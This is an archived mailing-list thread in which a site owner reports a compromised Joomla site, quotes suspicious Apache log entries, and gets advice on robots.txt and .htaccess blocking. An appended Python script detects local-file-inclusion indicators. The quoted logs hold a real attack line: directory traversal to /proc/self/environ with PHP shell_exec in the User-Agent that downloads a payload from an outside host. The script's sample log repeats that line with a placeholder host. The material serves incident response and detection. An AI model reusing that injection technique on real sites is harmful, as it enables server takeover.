[thelist] block phishing

James O'Donnell jimmyropes at gmail.com
Sun Mar 28 11:49:29 CDT 2010


Robots.txt only works if the robot is a legitimate one that honors your
wishes.

A rogue will just go to whatever folder it wants to access regardless of
what rules are stated in robots.txt.

-----Original Message-----
From: thelist-bounces at lists.evolt.org
[mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Meetin
Sent: Sunday, 28 March, 2010 12:20
To: thelist at lists.evolt.org
Subject: [thelist] block phishing

I got a notice that one of my sites got hit yesterday, so I logged in, 
and identified the file mentioned, also found a couple php files that 
got dropped into webhome that were related.  I moved the files into an 
out of webroot folder for future scrutinization, then checked the server 
access log, found a number of entries at the approximate date stamp of 
the uploaded files that seemed to be related.

I am methodically going through the system looking for anything not 
locked down.  What I could use some help with is understanding if the 
access log entries are associated and how to lock out the intruders.  As 
IP addresses change I suspect it's more than simply editing the 
robots.txt or adding a line in the .htaccess.  Some of the suspicious 
entries look like:

123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"

fat.php was one of the deposited files. 18:58 was the datestamp.

75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"

Related?  There is nothing (current) in the filesystem called host.php

80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt print_out.php');?>"

com_sectionex is a Joomla component.  There is also no legitimate file 
called print_out.php but which I found.

75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"

Suggestions for robots.txt:

#Baiduspider
User-agent: Baiduspider
Disallow: /

#Others
User-agent: *
Disallow: /

Suggestions for .htaccess:

<Files *.*>
        order allow,deny
        allow from all
        deny from 220.181.
</Files>

-Bob
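The entries Bob quotes are a textbook local-file-inclusion probe: directory traversal to /proc/self/environ, a null byte to cut off the file extension, and PHP code placed in the User-Agent so that it executes when the environ file is included. The script below is an added example, not code from the thread or from Joomla; it parses Apache combined-format lines and flags those indicators. The sample lines are constructed to mirror the ones in the post, with placeholder IPs and a placeholder download host.

```python
import re
from typing import Optional

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Indicators taken from the thread: repeated "../", /proc/self/environ and a null byte in the
# request path, and a PHP open tag in the User-Agent or Referer (the environ-injection trick).
SUSPICIOUS = [
    ("traversal", re.compile(r"(\.\./){3,}")),
    ("proc_environ", re.compile(r"/proc/self/environ", re.I)),
    ("null_byte", re.compile(r"%00")),
    ("php_in_header", re.compile(r"<\?(php)?\s", re.I)),
]

def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def flags_for(entry: dict) -> list:
    """Return the names of the indicators this entry matches (empty list = nothing suspicious)."""
    hits = []
    for name, rx in SUSPICIOUS:
        target = entry["ua"] + " " + entry["referer"] if name == "php_in_header" else entry["path"]
        if rx.search(target):
            hits.append(name)
    return hits

def scan(lines):
    """Yield (ip, time, path, flags) for every entry that matches at least one indicator."""
    for line in lines:
        e = parse_line(line)
        if e and (f := flags_for(e)):
            yield (e["ip"], e["time"], e["path"], f)

# Constructed sample log, modelled on the entries in the post (IPs and hostnames are placeholders).
SAMPLE_LOG = [
    '203.0.113.10 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"',
    '198.51.100.7 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex&controller=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1423 "-" "<? shell_exec(\'lwp-download http://example.invalid/tv.txt;mv tv.txt print_out.php\');?>"',
    '198.51.100.7 - - [27/Mar/2010:22:25:48 -0500] "GET /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\\"Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, when, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {when} {path[:60]} -> {', '.join(hits)}")
```

Entries the scanner does not flag (the crawler hit, the later GETs of dropped files) still matter: once a flagged IP is found, pull every line from that address in the same window, since that is how the follow-up requests to the uploaded files show up.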